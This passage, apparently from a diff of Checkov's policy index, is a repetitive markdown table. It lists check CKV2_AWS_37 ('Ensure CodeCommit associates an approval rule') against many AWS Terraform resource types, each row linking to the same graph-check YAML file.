[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1045 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1046 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1047 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1048 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1049 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1050 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1051 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1052 | CKV2_AWS_37 
| resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1053 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1054 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1055 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1056 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1057 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1058 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1059 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1060 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1061 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1062 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1063 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1064 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1065 
| CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1066 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1067 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1068 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1069 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1070 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1071 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1072 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1073 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1074 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1075 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1076 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1077 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1078 | CKV2_AWS_37 | resource | 
aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1079 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1080 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1081 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1082 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1083 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1084 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1085 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1086 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1087 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1088 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1089 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1090 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 
1091 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1092 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1093 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1094 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1095 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1096 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1097 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1098 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1099 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1100 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1101 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1102 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1103 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1104 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1105 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1106 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1107 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1108 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1109 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1110 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1111 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1112 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1113 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1114 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1115 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1116 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1117 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1118 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1119 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1120 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1121 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1122 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1123 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1124 | CKV2_AWS_37 | resource | 
aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1125 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1126 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1127 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1128 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1129 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1130 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
+| 1131 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1132 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1133 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1134 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1135 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1136 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1137 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1138 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1139 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1140 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1141 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1142 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1143 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1144 | CKV2_AWS_37 | resource | 
aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1145 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1146 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1147 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1148 | CKV2_AWS_37 | 